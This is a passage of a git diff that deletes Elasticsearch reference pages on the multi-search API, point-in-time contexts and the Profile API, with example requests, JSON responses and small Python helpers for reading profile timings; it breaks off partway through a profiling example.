- -[source,js] --------------------------------------------------- -$ cat requests -{"index" : "test"} -{"query" : {"match_all" : {}}, "from" : 0, "size" : 10} -{"index" : "test", "search_type" : "dfs_query_then_fetch"} -{"query" : {"match_all" : {}}} -{} -{"query" : {"match_all" : {}}} - -{"query" : {"match_all" : {}}} -{"search_type" : "dfs_query_then_fetch"} -{"query" : {"match_all" : {}}} --------------------------------------------------- -// NOTCONSOLE - -[source,js] --------------------------------------------------- -$ curl -H "Content-Type: application/x-ndjson" -XGET localhost:9200/_msearch --data-binary "@requests"; echo --------------------------------------------------- -// NOTCONSOLE - -Note, the above includes an example of an empty header (can also be just -without any content) which is supported as well. - - -The endpoint also allows you to search against data streams, indices, and index -aliases in the request path. In this case, it will be used as the default target -unless explicitly specified in the header's `index` parameter. For example: - -[source,console] --------------------------------------------------- -GET my-index-000001/_msearch -{} -{"query" : {"match_all" : {}}, "from" : 0, "size" : 10} -{} -{"query" : {"match_all" : {}}} -{"index" : "my-index-000002"} -{"query" : {"match_all" : {}}} --------------------------------------------------- -// TEST[setup:my_index] - -The above will execute the search against the `my-index-000001` index for all the -requests that don't define an `index` target in the request body. The last -search will be executed against the `my-index-000002` index. - -The `search_type` can be set in a similar manner to globally apply to -all search requests. - - -[[msearch-security]] -==== Security - -See <> - - -[[template-msearch]] -==== Template support - -Much like described in <> for the _search resource, _msearch -also provides support for templates. 
Submit them like follows for inline -templates: - -[source,console] ------------------------------------------------ -GET _msearch/template -{"index" : "my-index-000001"} -{ "source" : "{ \"query\": { \"match\": { \"message\" : \"{{keywords}}\" } } } }", "params": { "query_type": "match", "keywords": "some message" } } -{"index" : "my-index-000001"} -{ "source" : "{ \"query\": { \"match_{{template}}\": {} } }", "params": { "template": "all" } } ------------------------------------------------ -// TEST[setup:my_index] - - -You can also create search templates: - -[source,console] ------------------------------------------- -POST /_scripts/my_template_1 -{ - "script": { - "lang": "mustache", - "source": { - "query": { - "match": { - "message": "{{query_string}}" - } - } - } - } -} ------------------------------------------- -// TEST[setup:my_index] - - -[source,console] ------------------------------------------- -POST /_scripts/my_template_2 -{ - "script": { - "lang": "mustache", - "source": { - "query": { - "term": { - "{{field}}": "{{value}}" - } - } - } - } -} ------------------------------------------- -// TEST[continued] - -You can use search templates in a _msearch: - -[source,console] ------------------------------------------------ -GET _msearch/template -{"index" : "main"} -{ "id": "my_template_1", "params": { "query_string": "some message" } } -{"index" : "main"} -{ "id": "my_template_2", "params": { "field": "user", "value": "test" } } ------------------------------------------------ -// TEST[continued] - - -[[multi-search-partial-responses]] -==== Partial responses - -To ensure fast responses, the multi search API will respond with partial results -if one or more shards fail. See <> for more -information. - - -[[msearch-cancellation]] -==== Search Cancellation - -Multi searches can be cancelled using standard <> -mechanism and are also automatically cancelled when the http connection used to -perform the request is closed by the client. It is fundamental that the http -client sending requests closes connections whenever requests time out or are -aborted. Cancelling an msearch request will also cancel all of the corresponding -sub search requests. diff --git a/docs/reference/search/point-in-time-api.asciidoc b/docs/reference/search/point-in-time-api.asciidoc deleted file mode 100644 index f6b962a721f..00000000000 --- a/docs/reference/search/point-in-time-api.asciidoc +++ /dev/null @@ -1,120 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[point-in-time-api]] -=== Point in time API -++++ -Point in time -++++ - -A search request by default executes against the most recent visible data of -the target indices, which is called point in time. Elasticsearch pit (point in time) -is a lightweight view into the state of the data as it existed when initiated. -In some cases, it's preferred to perform multiple search requests using -the same point in time. For example, if <> happen between -search_after requests, then the results of those requests might not be consistent as -changes happening between searches are only visible to the more recent point in time. - -A point in time must be opened explicitly before being used in search requests. The -keep_alive parameter tells Elasticsearch how long it should keep a point in time alive, -e.g. `?keep_alive=5m`. 
- -[source,console] --------------------------------------------------- -POST /my-index-000001/_pit?keep_alive=1m --------------------------------------------------- -// TEST[setup:my_index] - -The result from the above request includes a `id`, which should -be passed to the `id` of the `pit` parameter of a search request. - -[source,console] --------------------------------------------------- -POST /_search <1> -{ - "size": 100, - "query": { - "match" : { - "title" : "elasticsearch" - } - }, - "pit": { - "id": "46ToAwMDaWR4BXV1aWQxAgZub2RlXzEAAAAAAAAAAAEBYQNpZHkFdXVpZDIrBm5vZGVfMwAAAAAAAAAAKgFjA2lkeQV1dWlkMioGbm9kZV8yAAAAAAAAAAAMAWICBXV1aWQyAAAFdXVpZDEAAQltYXRjaF9hbGw_gAAAAA==", <2> - "keep_alive": "1m" <3> - } -} --------------------------------------------------- -// TEST[catch:missing] - -<1> A search request with the `pit` parameter must not specify `index`, `routing`, -and {ref}/search-request-body.html#request-body-search-preference[`preference`] -as these parameters are copied from the point in time. -<2> The `id` parameter tells Elasticsearch to execute the request using contexts -from this point int time. -<3> The `keep_alive` parameter tells Elasticsearch how long it should extend -the time to live of the point in time. - -IMPORTANT: The open point in time request and each subsequent search request can -return different `id`; thus always use the most recently received `id` for the -next search request. - -[[point-in-time-keep-alive]] -==== Keeping point in time alive -The `keep_alive` parameter, which is passed to a open point in time request and -search request, extends the time to live of the corresponding point in time. -The value (e.g. `1m`, see <>) does not need to be long enough to -process all data -- it just needs to be long enough for the next request. - -Normally, the background merge process optimizes the index by merging together -smaller segments to create new, bigger segments. Once the smaller segments are -no longer needed they are deleted. However, open point-in-times prevent the -old segments from being deleted since they are still in use. - -TIP: Keeping older segments alive means that more disk space and file handles -are needed. Ensure that you have configured your nodes to have ample free file -handles. See <>. - -Additionally, if a segment contains deleted or updated documents then the -point in time must keep track of whether each document in the segment was live at -the time of the initial search request. Ensure that your nodes have sufficient heap -space if you have many open point-in-times on an index that is subject to ongoing -deletes or updates. - -You can check how many point-in-times (i.e, search contexts) are open with the -<>: - -[source,console] ---------------------------------------- -GET /_nodes/stats/indices/search ---------------------------------------- - -[[close-point-in-time-api]] -==== Close point in time API - -Point-in-time is automatically closed when its `keep_alive` has -been elapsed. However keeping point-in-times has a cost, as discussed in the -<>. Point-in-times should be closed -as soon as they are no longer used in search requests. 
- -[source,console] ---------------------------------------- -DELETE /_pit -{ - "id" : "46ToAwMDaWR4BXV1aWQxAgZub2RlXzEAAAAAAAAAAAEBYQNpZHkFdXVpZDIrBm5vZGVfMwAAAAAAAAAAKgFjA2lkeQV1dWlkMioGbm9kZV8yAAAAAAAAAAAMAWIBBXV1aWQyAAA=" -} ---------------------------------------- -// TEST[catch:missing] - -The API returns the following response: - -[source,console-result] --------------------------------------------------- -{ - "succeeded": true, <1> - "num_freed": 3 <2> -} --------------------------------------------------- -// TESTRESPONSE[s/"succeeded": true/"succeeded": $body.succeeded/] -// TESTRESPONSE[s/"num_freed": 3/"num_freed": $body.num_freed/] - -<1> If true, all search contexts associated with the point-in-time id are successfully closed -<2> The number of search contexts have been successfully closed diff --git a/docs/reference/search/point-in-time.asciidoc b/docs/reference/search/point-in-time.asciidoc deleted file mode 100644 index a79ca0f3ad4..00000000000 --- a/docs/reference/search/point-in-time.asciidoc +++ /dev/null @@ -1,116 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[point-in-time]] -==== Point in time - -A search request by default executes against the most recent visible data of -the target indices, which is called point in time. Elasticsearch pit (point in time) -is a lightweight view into the state of the data as it existed when initiated. -In some cases, it's preferred to perform multiple search requests using -the same point in time. For example, if <> happen between -search_after requests, then the results of those requests might not be consistent as -changes happening between searches are only visible to the more recent point in time. - -A point in time must be opened explicitly before being used in search requests. The -keep_alive parameter tells Elasticsearch how long it should keep a point in time alive, -e.g. `?keep_alive=5m`. - -[source,console] --------------------------------------------------- -POST /my-index-000001/_pit?keep_alive=1m --------------------------------------------------- -// TEST[setup:my_index] - -The result from the above request includes a `id`, which should -be passed to the `id` of the `pit` parameter of a search request. - -[source,console] --------------------------------------------------- -POST /_search <1> -{ - "size": 100, - "query": { - "match" : { - "title" : "elasticsearch" - } - }, - "pit": { - "id": "46ToAwMDaWR4BXV1aWQxAgZub2RlXzEAAAAAAAAAAAEBYQNpZHkFdXVpZDIrBm5vZGVfMwAAAAAAAAAAKgFjA2lkeQV1dWlkMioGbm9kZV8yAAAAAAAAAAAMAWICBXV1aWQyAAAFdXVpZDEAAQltYXRjaF9hbGw_gAAAAA==", <2> - "keep_alive": "1m" <3> - } -} --------------------------------------------------- -// TEST[catch:missing] - -<1> A search request with the `pit` parameter must not specify `index`, `routing`, -and {ref}/search-request-body.html#request-body-search-preference[`preference`] -as these parameters are copied from the point in time. -<2> The `id` parameter tells Elasticsearch to execute the request using contexts -from this point int time. -<3> The `keep_alive` parameter tells Elasticsearch how long it should extend -the time to live of the point in time. - -IMPORTANT: The open point in time request and each subsequent search request can -return different `id`; thus always use the most recently received `id` for the -next search request. - -[[point-in-time-keep-alive]] -===== Keeping point in time alive -The `keep_alive` parameter, which is passed to a open point in time request and -search request, extends the time to live of the corresponding point in time. 
-The value (e.g. `1m`, see <>) does not need to be long enough to
-process all data -- it just needs to be long enough for the next request.
-
-Normally, the background merge process optimizes the index by merging together
-smaller segments to create new, bigger segments. Once the smaller segments are
-no longer needed, they are deleted. However, open point-in-times prevent the
-old segments from being deleted since they are still in use.
-
-TIP: Keeping older segments alive means that more disk space and file handles
-are needed. Ensure that you have configured your nodes to have ample free file
-handles. See <>.
-
-Additionally, if a segment contains deleted or updated documents, then the
-point in time must keep track of whether each document in the segment was live at
-the time of the initial search request. Ensure that your nodes have sufficient heap
-space if you have many open point-in-times on an index that is subject to ongoing
-deletes or updates.
-
-You can check how many point-in-times (i.e., search contexts) are open with the
-<>:
-
-[source,console]
---------------------------------------
-GET /_nodes/stats/indices/search
---------------------------------------
-
-===== Close point in time API
-
-A point-in-time is automatically closed when its `keep_alive` period has
-elapsed. However, keeping point-in-times open has a cost, as discussed in the
-<>. Point-in-times should be closed
-as soon as they are no longer used in search requests.
-
-[source,console]
---------------------------------------
-DELETE /_pit
-{
-  "id" : "46ToAwMDaWR4BXV1aWQxAgZub2RlXzEAAAAAAAAAAAEBYQNpZHkFdXVpZDIrBm5vZGVfMwAAAAAAAAAAKgFjA2lkeQV1dWlkMioGbm9kZV8yAAAAAAAAAAAMAWIBBXV1aWQyAAA="
-}
---------------------------------------
-// TEST[catch:missing]
-
-The API returns the following response:
-
-[source,console-result]
---------------------------------------------------
-{
-  "succeeded": true, <1>
-  "num_freed": 3     <2>
-}
---------------------------------------------------
-// TESTRESPONSE[s/"succeeded": true/"succeeded": $body.succeeded/]
-// TESTRESPONSE[s/"num_freed": 3/"num_freed": $body.num_freed/]
-
-<1> If `true`, all search contexts associated with the point-in-time id have been successfully closed
-<2> The number of search contexts that have been successfully closed
diff --git a/docs/reference/search/profile.asciidoc b/docs/reference/search/profile.asciidoc
deleted file mode 100644
index a48479d62f5..00000000000
--- a/docs/reference/search/profile.asciidoc
+++ /dev/null
@@ -1,945 +0,0 @@
-[[search-profile]]
-=== Profile API
-
-WARNING: The Profile API is a debugging tool and adds significant overhead to search execution.
-
-Provides detailed timing information about the execution of individual
-components in a search request.
-
-
-[[search-profile-api-desc]]
-==== {api-description-title}
-
-The Profile API gives the user insight into how search requests are executed at
-a low level so that the user can understand why certain requests are slow, and
-take steps to improve them. Note that the Profile API,
-<>, doesn't measure network latency,
-time spent in the search fetch phase, time the request spends waiting in
-queues, or time spent merging shard responses on the coordinating node.
-
-The output from the Profile API is *very* verbose, especially for complicated
-requests executed across many shards. Pretty-printing the response is
-recommended to help understand the output.
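-
-Since pretty-printing is so helpful here, a quick way to capture a readable
-profile is to request only the `profile` section and pretty-print it. The sketch
-below does that with the Python `requests` package; the `http://localhost:9200`
-endpoint, the missing authentication, and the example query are assumptions for
-illustration only.
-
-[source,python]
---------------------------------------------------
-import json
-
-import requests
-
-ES = "http://localhost:9200"  # assumption: local, unsecured cluster
-
-body = {
-    "profile": True,
-    "query": {"match": {"message": "GET /search"}},
-}
-
-# filter_path trims the response down to just the profile section.
-resp = requests.post(
-    f"{ES}/my-index-000001/_search",
-    params={"filter_path": "profile"},
-    json=body,
-).json()
-
-print(json.dumps(resp, indent=2))
--------------------------------------------------- 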
- - -[[search-profile-api-example]] -==== {api-examples-title} - - -Any `_search` request can be profiled by adding a top-level `profile` parameter: - -[source,console] --------------------------------------------------- -GET /my-index-000001/_search -{ - "profile": true,<1> - "query" : { - "match" : { "message" : "GET /search" } - } -} --------------------------------------------------- -// TEST[setup:my_index] - -<1> Setting the top-level `profile` parameter to `true` will enable profiling -for the search. - - -The API returns the following result: - -[source,console-result] --------------------------------------------------- -{ - "took": 25, - "timed_out": false, - "_shards": { - "total": 1, - "successful": 1, - "skipped": 0, - "failed": 0 - }, - "hits": { - "total": { - "value": 5, - "relation": "eq" - }, - "max_score": 0.17402273, - "hits": [...] <1> - }, - "profile": { - "shards": [ - { - "id": "[2aE02wS1R8q_QFnYu6vDVQ][my-index-000001][0]", - "searches": [ - { - "query": [ - { - "type": "BooleanQuery", - "description": "message:get - message:search", "time_in_nanos" : 11972972, "breakdown" : - { - "set_min_competitive_score_count": 0, - "match_count": 5, - "shallow_advance_count": 0, - "set_min_competitive_score": 0, - "next_doc": 39022, - "match": 4456, - "next_doc_count": 5, - "score_count": 5, - "compute_max_score_count": 0, - "compute_max_score": 0, - "advance": 84525, - "advance_count": 1, - "score": 37779, - "build_scorer_count": 2, - "create_weight": 4694895, - "shallow_advance": 0, - "create_weight_count": 1, - "build_scorer": 7112295 - }, - "children": [ - { - "type": "TermQuery", - "description": "message:get", - "time_in_nanos": 3801935, - "breakdown": { - "set_min_competitive_score_count": 0, - "match_count": 0, - "shallow_advance_count": 3, - "set_min_competitive_score": 0, - "next_doc": 0, - "match": 0, - "next_doc_count": 0, - "score_count": 5, - "compute_max_score_count": 3, - "compute_max_score": 32487, - "advance": 5749, - "advance_count": 6, - "score": 16219, - "build_scorer_count": 3, - "create_weight": 2382719, - "shallow_advance": 9754, - "create_weight_count": 1, - "build_scorer": 1355007 - } - }, - { - "type": "TermQuery", - "description": "message:search", - "time_in_nanos": 205654, - "breakdown": { - "set_min_competitive_score_count": 0, - "match_count": 0, - "shallow_advance_count": 3, - "set_min_competitive_score": 0, - "next_doc": 0, - "match": 0, - "next_doc_count": 0, - "score_count": 5, - "compute_max_score_count": 3, - "compute_max_score": 6678, - "advance": 12733, - "advance_count": 6, - "score": 6627, - "build_scorer_count": 3, - "create_weight": 130951, - "shallow_advance": 2512, - "create_weight_count": 1, - "build_scorer": 46153 - } - } - ] - } - ], - "rewrite_time": 451233, - "collector": [ - { - "name": "SimpleTopScoreDocCollector", - "reason": "search_top_hits", - "time_in_nanos": 775274 - } - ] - } - ], - "aggregations": [] - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 25/"took": $body.took/] -// TESTRESPONSE[s/"hits": \[...\]/"hits": $body.$_path/] -// TESTRESPONSE[s/(?<=[" ])\d+(\.\d+)?/$body.$_path/] -// TESTRESPONSE[s/\[2aE02wS1R8q_QFnYu6vDVQ\]\[my-index-000001\]\[0\]/$body.$_path/] - -<1> Search results are returned, but were omitted here for brevity. - -Even for a simple query, the response is relatively complicated. Let's break it -down piece-by-piece before moving to more complex examples. 
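-
-Before doing that, it can help to get a quick orientation: how many shards
-reported a profile, and what each shard's profile contains. The snippet below is
-a plain-Python sketch over a parsed response such as the one above; `resp` is
-assumed to be the decoded JSON body.
-
-[source,python]
---------------------------------------------------
-def outline_profile(resp):
-    """Print one line per profiled shard with the number of searches and aggregations."""
-    for shard in resp["profile"]["shards"]:
-        print(
-            f'{shard["id"]}: '
-            f'{len(shard["searches"])} search(es), '
-            f'{len(shard["aggregations"])} aggregation profile(s)'
-        )
--------------------------------------------------- 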
- - -The overall structure of the profile response is as follows: - -[source,console-result] --------------------------------------------------- -{ - "profile": { - "shards": [ - { - "id": "[2aE02wS1R8q_QFnYu6vDVQ][my-index-000001][0]", <1> - "searches": [ - { - "query": [...], <2> - "rewrite_time": 51443, <3> - "collector": [...] <4> - } - ], - "aggregations": [...] <5> - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"profile": /"took": $body.took, "timed_out": $body.timed_out, "_shards": $body._shards, "hits": $body.hits, "profile": /] -// TESTRESPONSE[s/(?<=[" ])\d+(\.\d+)?/$body.$_path/] -// TESTRESPONSE[s/\[2aE02wS1R8q_QFnYu6vDVQ\]\[my-index-000001\]\[0\]/$body.$_path/] -// TESTRESPONSE[s/"query": \[...\]/"query": $body.$_path/] -// TESTRESPONSE[s/"collector": \[...\]/"collector": $body.$_path/] -// TESTRESPONSE[s/"aggregations": \[...\]/"aggregations": []/] -<1> A profile is returned for each shard that participated in the response, and -is identified by a unique ID. -<2> Each profile contains a section which holds details about the query -execution. -<3> Each profile has a single time representing the cumulative rewrite time. -<4> Each profile also contains a section about the Lucene Collectors which run -the search. -<5> Each profile contains a section which holds the details about the -aggregation execution. - -Because a search request may be executed against one or more shards in an index, -and a search may cover one or more indices, the top level element in the profile -response is an array of `shard` objects. Each shard object lists its `id` which -uniquely identifies the shard. The ID's format is -`[nodeID][indexName][shardID]`. - -The profile itself may consist of one or more "searches", where a search is a -query executed against the underlying Lucene index. Most search requests -submitted by the user will only execute a single `search` against the Lucene -index. But occasionally multiple searches will be executed, such as including a -global aggregation (which needs to execute a secondary "match_all" query for the -global context). - -Inside each `search` object there will be two arrays of profiled information: -a `query` array and a `collector` array. Alongside the `search` object is an -`aggregations` object that contains the profile information for the -aggregations. In the future, more sections may be added, such as `suggest`, -`highlight`, etc. - -There will also be a `rewrite` metric showing the total time spent rewriting the -query (in nanoseconds). - -NOTE: As with other statistics apis, the Profile API supports human readable outputs. This can be turned on by adding -`?human=true` to the query string. In this case, the output contains the additional `time` field containing rounded, -human readable timing information (e.g. `"time": "391,9ms"`, `"time": "123.3micros"`). - -[[profiling-queries]] -==== Profiling Queries - -[NOTE] -======================================= -The details provided by the Profile API directly expose Lucene class names and concepts, which means -that complete interpretation of the results require fairly advanced knowledge of Lucene. This -page attempts to give a crash-course in how Lucene executes queries so that you can use the Profile API to successfully -diagnose and debug queries, but it is only an overview. For complete understanding, please refer -to Lucene's documentation and, in places, the code. - -With that said, a complete understanding is often not required to fix a slow query. 
It is usually
-sufficient to see that a particular component of a query is slow, and not necessarily to understand why
-the `advance` phase of that query is the cause, for example.
-=======================================
-
-[[query-section]]
-===== `query` Section
-
-The `query` section contains detailed timing of the query tree executed by
-Lucene on a particular shard. The overall structure of this query tree will
-resemble your original Elasticsearch query, but may be slightly (or sometimes
-very) different. It will also use similar but not always identical naming.
-Using our previous `match` query example, let's analyze the `query` section:
-
-[source,console-result]
---------------------------------------------------
-"query": [
-    {
-       "type": "BooleanQuery",
-       "description": "message:get message:search",
-       "time_in_nanos": "11972972",
-       "breakdown": {...},               <1>
-       "children": [
-          {
-             "type": "TermQuery",
-             "description": "message:get",
-             "time_in_nanos": "3801935",
-             "breakdown": {...}
-          },
-          {
-             "type": "TermQuery",
-             "description": "message:search",
-             "time_in_nanos": "205654",
-             "breakdown": {...}
-          }
-       ]
-    }
-]
---------------------------------------------------
-// TESTRESPONSE[s/^/{\n"took": $body.took,\n"timed_out": $body.timed_out,\n"_shards": $body._shards,\n"hits": $body.hits,\n"profile": {\n"shards": [ {\n"id": "$body.$_path",\n"searches": [{\n/]
-// TESTRESPONSE[s/]$/],"rewrite_time": $body.$_path, "collector": $body.$_path}], "aggregations": []}]}}/]
-// TESTRESPONSE[s/(?<=[" ])\d+(\.\d+)?/$body.$_path/]
-// TESTRESPONSE[s/"breakdown": \{...\}/"breakdown": $body.$_path/]
-<1> The breakdown timings are omitted for simplicity.
-
-Based on the profile structure, we can see that our `match` query was rewritten
-by Lucene into a BooleanQuery with two clauses (both holding a TermQuery). The
-`type` field displays the Lucene class name, and often aligns with the
-equivalent name in Elasticsearch. The `description` field displays the Lucene
-explanation text for the query, and is made available to help differentiate
-between parts of your query (e.g. both `message:get` and `message:search` are
-TermQueries and would appear identical otherwise).
-
-The `time_in_nanos` field shows that this query took ~11.9ms for the entire
-BooleanQuery to execute. The recorded time is inclusive of all children.
-
-The `breakdown` field gives detailed stats about how the time was spent;
-we'll look at that in a moment. Finally, the `children` array lists any
-sub-queries that may be present. Because we searched for two values ("get
-search"), our BooleanQuery holds two child TermQueries. They have identical
-information (type, time, breakdown, etc.). Children are allowed to have their
-own children.
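-
-Because `children` can nest arbitrarily deep, a small recursive helper makes the
-query tree easier to scan. This is only a sketch over the JSON structure shown
-above (parsed into Python dictionaries); it is not part of the API.
-
-[source,python]
---------------------------------------------------
-def print_query_tree(queries, depth=0):
-    """Recursively print each profiled query with its type, description, and time."""
-    for query in queries:
-        ms = int(query["time_in_nanos"]) / 1_000_000  # inclusive of all children
-        print(f'{"  " * depth}{query["type"]}  {query["description"]}  {ms:.2f} ms')
-        print_query_tree(query.get("children", []), depth + 1)
-
-# For a profiled search response parsed into `resp`:
-# print_query_tree(resp["profile"]["shards"][0]["searches"][0]["query"])
--------------------------------------------------- 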
- -===== Timing Breakdown - -The `breakdown` component lists detailed timing statistics about low-level -Lucene execution: - -[source,console-result] --------------------------------------------------- -"breakdown": { - "set_min_competitive_score_count": 0, - "match_count": 5, - "shallow_advance_count": 0, - "set_min_competitive_score": 0, - "next_doc": 39022, - "match": 4456, - "next_doc_count": 5, - "score_count": 5, - "compute_max_score_count": 0, - "compute_max_score": 0, - "advance": 84525, - "advance_count": 1, - "score": 37779, - "build_scorer_count": 2, - "create_weight": 4694895, - "shallow_advance": 0, - "create_weight_count": 1, - "build_scorer": 7112295 -} --------------------------------------------------- -// TESTRESPONSE[s/^/{\n"took": $body.took,\n"timed_out": $body.timed_out,\n"_shards": $body._shards,\n"hits": $body.hits,\n"profile": {\n"shards": [ {\n"id": "$body.$_path",\n"searches": [{\n"query": [{\n"type": "BooleanQuery",\n"description": "message:get message:search",\n"time_in_nanos": $body.$_path,/] -// TESTRESPONSE[s/}$/},\n"children": $body.$_path}],\n"rewrite_time": $body.$_path, "collector": $body.$_path}], "aggregations": []}]}}/] -// TESTRESPONSE[s/(?<=[" ])\d+(\.\d+)?/$body.$_path/] - -Timings are listed in wall-clock nanoseconds and are not normalized at all. All -caveats about the overall `time_in_nanos` apply here. The intention of the -breakdown is to give you a feel for A) what machinery in Lucene is actually -eating time, and B) the magnitude of differences in times between the various -components. Like the overall time, the breakdown is inclusive of all children -times. - -The meaning of the stats are as follows: - -[discrete] -===== All parameters: - -[horizontal] -`create_weight`:: - - A Query in Lucene must be capable of reuse across multiple IndexSearchers (think of it as the engine that - executes a search against a specific Lucene Index). This puts Lucene in a tricky spot, since many queries - need to accumulate temporary state/statistics associated with the index it is being used against, but the - Query contract mandates that it must be immutable. - {empty} + - {empty} + - To get around this, Lucene asks each query to generate a Weight object which acts as a temporary context - object to hold state associated with this particular (IndexSearcher, Query) tuple. The `weight` metric - shows how long this process takes - -`build_scorer`:: - - This parameter shows how long it takes to build a Scorer for the query. A Scorer is the mechanism that - iterates over matching documents and generates a score per-document (e.g. how well does "foo" match the document?). - Note, this records the time required to generate the Scorer object, not actually score the documents. Some - queries have faster or slower initialization of the Scorer, depending on optimizations, complexity, etc. - {empty} + - {empty} + - This may also show timing associated with caching, if enabled and/or applicable for the query - -`next_doc`:: - - The Lucene method `next_doc` returns Doc ID of the next document matching the query. This statistic shows - the time it takes to determine which document is the next match, a process that varies considerably depending - on the nature of the query. Next_doc is a specialized form of advance() which is more convenient for many - queries in Lucene. 
It is equivalent to advance(docId() + 1) - -`advance`:: - - `advance` is the "lower level" version of next_doc: it serves the same purpose of finding the next matching - doc, but requires the calling query to perform extra tasks such as identifying and moving past skips, etc. - However, not all queries can use next_doc, so `advance` is also timed for those queries. - {empty} + - {empty} + - Conjunctions (e.g. `must` clauses in a Boolean) are typical consumers of `advance` - -`match`:: - - Some queries, such as phrase queries, match documents using a "two-phase" process. First, the document is - "approximately" matched, and if it matches approximately, it is checked a second time with a more rigorous - (and expensive) process. The second phase verification is what the `match` statistic measures. - {empty} + - {empty} + - For example, a phrase query first checks a document approximately by ensuring all terms in the phrase are - present in the doc. If all the terms are present, it then executes the second phase verification to ensure - the terms are in-order to form the phrase, which is relatively more expensive than just checking for presence - of the terms. - {empty} + - {empty} + - Because this two-phase process is only used by a handful of queries, the `match` statistic is often zero - -`score`:: - - This records the time taken to score a particular document via its Scorer - -`*_count`:: - Records the number of invocations of the particular method. For example, `"next_doc_count": 2,` - means the `nextDoc()` method was called on two different documents. This can be used to help judge - how selective queries are, by comparing counts between different query components. - - -[[collectors-section]] -===== `collectors` Section - -The Collectors portion of the response shows high-level execution details. -Lucene works by defining a "Collector" which is responsible for coordinating the -traversal, scoring, and collection of matching documents. Collectors are also -how a single query can record aggregation results, execute unscoped "global" -queries, execute post-query filters, etc. - -Looking at the previous example: - -[source,console-result] --------------------------------------------------- -"collector": [ - { - "name": "SimpleTopScoreDocCollector", - "reason": "search_top_hits", - "time_in_nanos": 775274 - } -] --------------------------------------------------- -// TESTRESPONSE[s/^/{\n"took": $body.took,\n"timed_out": $body.timed_out,\n"_shards": $body._shards,\n"hits": $body.hits,\n"profile": {\n"shards": [ {\n"id": "$body.$_path",\n"searches": [{\n"query": $body.$_path,\n"rewrite_time": $body.$_path,/] -// TESTRESPONSE[s/]$/]}], "aggregations": []}]}}/] -// TESTRESPONSE[s/(?<=[" ])\d+(\.\d+)?/$body.$_path/] - - -We see a single collector named `SimpleTopScoreDocCollector` wrapped into -`CancellableCollector`. `SimpleTopScoreDocCollector` is the default "scoring and -sorting" `Collector` used by {es}. The `reason` field attempts to give a plain -English description of the class name. The `time_in_nanos` is similar to the -time in the Query tree: a wall-clock time inclusive of all children. Similarly, -`children` lists all sub-collectors. The `CancellableCollector` that wraps -`SimpleTopScoreDocCollector` is used by {es} to detect if the current search was -cancelled and stop collecting documents as soon as it occurs. - -It should be noted that Collector times are **independent** from the Query -times. They are calculated, combined, and normalized independently! 
Due to the
-nature of Lucene's execution, it is impossible to "merge" the times from the
-Collectors into the Query section, so they are displayed in separate portions.
-
-For reference, the various collector reasons are:
-
-[horizontal]
-`search_sorted`::
-
-    A collector that scores and sorts documents. This is the most common collector and will be seen in most
-    simple searches.
-
-`search_count`::
-
-    A collector that only counts the number of documents that match the query, but does not fetch the source.
-    This is seen when `size: 0` is specified.
-
-`search_terminate_after_count`::
-
-    A collector that terminates search execution after `n` matching documents have been found. This is seen
-    when the `terminate_after` query parameter has been specified.
-
-`search_min_score`::
-
-    A collector that only returns matching documents that have a score greater than `n`. This is seen when
-    the top-level parameter `min_score` has been specified.
-
-`search_multi`::
-
-    A collector that wraps several other collectors. This is seen when combinations of search, aggregations,
-    global aggs, and post_filters are combined in a single search.
-
-`search_timeout`::
-
-    A collector that halts execution after a specified period of time. This is seen when a `timeout` top-level
-    parameter has been specified.
-
-`aggregation`::
-
-    A collector that Elasticsearch uses to run aggregations against the query scope. A single `aggregation`
-    collector is used to collect documents for *all* aggregations, so you will see a list of aggregations
-    in the name rather than a separate collector for each.
-
-`global_aggregation`::
-
-    A collector that executes an aggregation against the global query scope, rather than the specified query.
-    Because the global scope is necessarily different from the executed query, it must execute its own
-    match_all query (which you will see added to the Query section) to collect your entire dataset.
-
-
-[[rewrite-section]]
-===== `rewrite` Section
-
-All queries in Lucene undergo a "rewriting" process. A query (and its
-sub-queries) may be rewritten one or more times, and the process continues until
-the query stops changing. This process allows Lucene to perform optimizations,
-such as removing redundant clauses or replacing one query with a more efficient
-execution path. For example, a Boolean -> Boolean -> TermQuery can be
-rewritten to a single TermQuery, because all the Booleans are unnecessary in this case.
-
-The rewriting process is complex and difficult to display, since queries can
-change drastically. Rather than showing the intermediate results, the total
-rewrite time is simply displayed as a value (in nanoseconds). This value is
-cumulative and contains the total time for all queries being rewritten.
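-
-One practical way to use the `rewrite` and `collector` numbers together is to
-print a per-shard summary next to the collector tree. The helper below is a
-plain-Python sketch over a parsed profile response (the same dictionary-walking
-approach as before); `resp` is assumed to be the decoded JSON body of a profiled
-search.
-
-[source,python]
---------------------------------------------------
-def print_collectors(collectors, depth=1):
-    """Recursively print each collector with its reason and wall-clock time."""
-    for collector in collectors:
-        ms = collector["time_in_nanos"] / 1_000_000
-        print(f'{"  " * depth}{collector["name"]} [{collector["reason"]}]: {ms:.3f} ms')
-        print_collectors(collector.get("children", []), depth + 1)
-
-def summarize_searches(resp):
-    """For each shard, show the cumulative rewrite time and the collector tree."""
-    for shard in resp["profile"]["shards"]:
-        print(shard["id"])
-        for search in shard["searches"]:
-            print(f'  rewrite_time: {search["rewrite_time"] / 1_000_000:.3f} ms')
-            print_collectors(search["collector"], depth=1)
--------------------------------------------------- 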
- -===== A more complex example - -To demonstrate a slightly more complex query and the associated results, we can -profile the following query: - -[source,console] --------------------------------------------------- -GET /my-index-000001/_search -{ - "profile": true, - "query": { - "term": { - "user.id": { - "value": "elkbee" - } - } - }, - "aggs": { - "my_scoped_agg": { - "terms": { - "field": "http.response.status_code" - } - }, - "my_global_agg": { - "global": {}, - "aggs": { - "my_level_agg": { - "terms": { - "field": "http.response.status_code" - } - } - } - } - }, - "post_filter": { - "match": { - "message": "search" - } - } -} --------------------------------------------------- -// TEST[setup:my_index] -// TEST[s/_search/_search\?filter_path=profile.shards.id,profile.shards.searches,profile.shards.aggregations/] - - -This example has: - -- A query -- A scoped aggregation -- A global aggregation -- A post_filter - - -The API returns the following result: - -[source,console-result] --------------------------------------------------- -{ - ... - "profile": { - "shards": [ - { - "id": "[P6-vulHtQRWuD4YnubWb7A][my-index-000001][0]", - "searches": [ - { - "query": [ - { - "type": "TermQuery", - "description": "message:search", - "time_in_nanos": 141618, - "breakdown": { - "set_min_competitive_score_count": 0, - "match_count": 0, - "shallow_advance_count": 0, - "set_min_competitive_score": 0, - "next_doc": 0, - "match": 0, - "next_doc_count": 0, - "score_count": 0, - "compute_max_score_count": 0, - 